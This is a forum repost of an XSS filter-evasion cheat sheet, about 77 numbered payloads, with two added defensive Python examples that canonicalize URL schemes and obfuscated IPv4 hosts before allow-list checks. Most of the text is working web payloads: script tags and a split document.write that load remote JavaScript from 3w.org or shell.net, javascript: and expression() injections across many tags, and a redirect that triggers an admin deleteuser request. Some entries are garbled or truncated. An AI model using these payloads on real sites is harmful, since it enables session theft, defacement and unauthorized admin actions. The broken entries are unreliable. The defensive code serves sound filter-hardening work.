There seems to be little XSS material on t00ls, so when I saw this good stuff I copied it over; not sure whether any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using the JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multiline JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters are basically ineffective domestically, since there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=" javascript:alert('XSS');">
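Items (4) through (19) all defeat the same weak defence: a filter that searches an attribute value for the literal string `javascript:`. A browser entity-decodes the attribute first, ignores tabs, newlines, carriage returns, leading whitespace and (in older engines) NUL bytes inside the scheme, and matches the scheme case-insensitively, so the check has to see the value the way the browser will. The following is an added defensive example written for this page; it is not code from the original post or from the cheat sheet it reproduces. It canonicalizes an href/src value before looking at the scheme and then admits only an explicit allow-list of schemes. The function names, the allow-list and the sample inputs are my own.

```python
import html
import re
from urllib.parse import urlsplit

# Schemes a page may legitimately link to or load from (example allow-list,
# not a recommendation for any particular site).
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# ASCII control characters and the space. Browsers drop these while parsing a
# URL scheme, which is exactly what the tab / newline / CR / NUL payloads rely on.
_IGNORED_CHARS = re.compile(r"[\x00-\x20\x7f]")


def canonicalize_url(value: str) -> str:
    """Return the URL as the browser will interpret it, not as it was written.

    1. Decode HTML character references (decimal or hex, with or without the
       trailing semicolon), because an attribute value is entity-decoded first.
    2. Strip control characters and spaces that parsers ignore inside the
       scheme, so 'jav\\tascript:' and 'java\\x00script:' collapse to 'javascript:'.
    Mixed case such as 'JaVaScRiPt:' is handled by urlsplit(), which lower-cases
    the scheme it extracts.
    """
    decoded = html.unescape(value)
    return _IGNORED_CHARS.sub("", decoded)


def url_scheme(value: str) -> str:
    """Scheme of the canonicalized URL, lower-cased; '' for a relative URL."""
    return urlsplit(canonicalize_url(value)).scheme


def is_safe_url(value: str) -> bool:
    """True if the value is a relative URL or uses an allow-listed scheme."""
    scheme = url_scheme(value)
    if scheme == "":
        return True  # relative or scheme-relative URL: no scheme to abuse
    return scheme in ALLOWED_SCHEMES


# Constructed sample attribute values modelled on items (4)-(19) above,
# paired with the verdict a correct filter must reach.
SAMPLES = [
    ("https://example.com/page", True),
    ("/images/logo.png", True),
    ("mailto:security@example.com", True),
    ("JaVaScRiPt:alert('XSS')", False),                     # mixed case
    ("&#106;&#97;&#118;&#97;script:alert('XSS')", False),   # decimal entities
    ("&#0000106&#0000097vascript:alert('XSS')", False),     # no semicolons
    ("&#x6A;&#x61;vascript:alert('XSS')", False),           # hex entities
    ("jav&#x09;ascript:alert('XSS');", False),              # encoded tab
    ("jav\nascript:alert('XSS');", False),                  # embedded newline
    ("jav\rascript:alert('XSS');", False),                  # embedded CR
    ("java\x00script:alert('XSS')", False),                 # NUL byte
    (" javascript:alert('XSS');", False),                   # leading space
    ("vbscript:msgbox(\"XSS\")", False),                    # another script scheme
]


def check_samples() -> bool:
    """Run every sample through is_safe_url and report whether all verdicts match."""
    all_ok = True
    for value, expected in SAMPLES:
        result = is_safe_url(value)
        print(f"{str(result):5}  expected {str(expected):5}  {value!r}")
        all_ok = all_ok and (result == expected)
    return all_ok


if __name__ == "__main__":
    print("all samples classified as expected:", check_samples())
```

The check is an allow-list on the canonical form, not a blocklist on the raw string: anything that is not a relative URL and not one of the permitted schemes is refused, so `data:`, `vbscript:` and whatever the next browser-specific scheme turns out to be are rejected without a rule for each. A scheme check says nothing about the host, so a protocol-relative value such as `//3w.org/xss.js` still passes here and needs a separate host allow-list if the application cares where scripts are loaded from.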
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META with a link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with STYLE (made up of an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can add the JS code to an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
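Items (68) through (76) are not script injection but host obfuscation: a decimal, hexadecimal, octal or mixed IP literal, a scheme-relative URL, a dropped `www`, or a trailing dot on the DNS name all reach the same server while slipping past a filter that compares URL strings. The defence is to reduce the host to one canonical form before any allow-list comparison. The following is an added example written for this page, not code from the original post or the cheat sheet it reproduces: it parses legacy IPv4 literals with the `inet_aton` rules that browsers historically followed (one to four dot-separated components, each decimal, `0x` hex or leading-zero octal, the last component filling the remaining bytes), normalizes the DNS name, and checks the result against an allow-list. The function names and the sample allow-list are my own.

```python
from typing import Optional, Set
from urllib.parse import urlsplit


def _parse_ipv4_component(part: str) -> int:
    """One dotted component under inet_aton rules: '0x..' hex, '0..' octal, else decimal."""
    # Reject signs, underscores and non-ASCII digits that int() would otherwise accept.
    if not part or not part.isascii() or not part.isalnum():
        raise ValueError(part)
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def parse_legacy_ipv4(host: str) -> Optional[str]:
    """Dotted-decimal form if host is a legacy IPv4 literal, otherwise None.

    With fewer than four components the last one covers the remaining low-order
    bytes, so '3232235521', '0xc0.0xa8.0x00.0x01' and '0300.0250.0000.0001'
    all denote 192.168.0.1.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_ipv4_component(p) for p in parts]
    except ValueError:
        return None  # not an IP literal, treat it as a DNS name
    last_bytes = 5 - len(values)  # how many bytes the final component fills
    if any(v > 0xFF for v in values[:-1]) or values[-1] >= 1 << (8 * last_bytes):
        return None  # a component is out of range
    addr = 0
    for v in values[:-1]:
        addr = (addr << 8) | v
    addr = (addr << (8 * last_bytes)) | values[-1]
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url: str) -> Optional[str]:
    """The host the browser will actually contact, in a form safe to compare."""
    if url.startswith("//"):
        url = "http:" + url  # scheme-relative URL inherits the page's scheme
    host = urlsplit(url).hostname  # lower-cased, userinfo and port removed
    if host is None:
        return None
    host = host.rstrip(".")  # 'www.google.com.' names the same zone as 'www.google.com'
    return parse_legacy_ipv4(host) or host


def is_allowed_host(url: str, allowed: Set[str]) -> bool:
    """Compare the canonical host, never the raw URL string, with the allow-list."""
    host = canonical_host(url)
    return host is not None and host in allowed


if __name__ == "__main__":
    # Constructed allow-list; the URLs are the obfuscated forms from items (70)-(76).
    allowed = {"192.168.0.1", "www.google.com"}
    for url in (
        "http://3232235521/",
        "http://0xc0.0xa8.0x00.0x01/",
        "http://0300.0250.0000.0001/",
        "http://66.000146.0x7.147/",
        "//www.google.com/",
        "http://www.google.com./",
        "http://google.com/",
    ):
        print(f"{url:32} -> {canonical_host(url)!s:16} allowed={is_allowed_host(url, allowed)}")
```

Comparing on the canonical host makes the four spellings of 192.168.0.1 in items (70) through (73) indistinguishable from the plain one, and lets `//www.google.com/` and `http://www.google.com./` match an entry for `www.google.com`. Note that `google.com` and `www.google.com` remain distinct hosts, as they should; whether both belong on the allow-list is a policy decision, not a parsing one.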
Original source: http://fuzzexp.org/u/0day/?p=141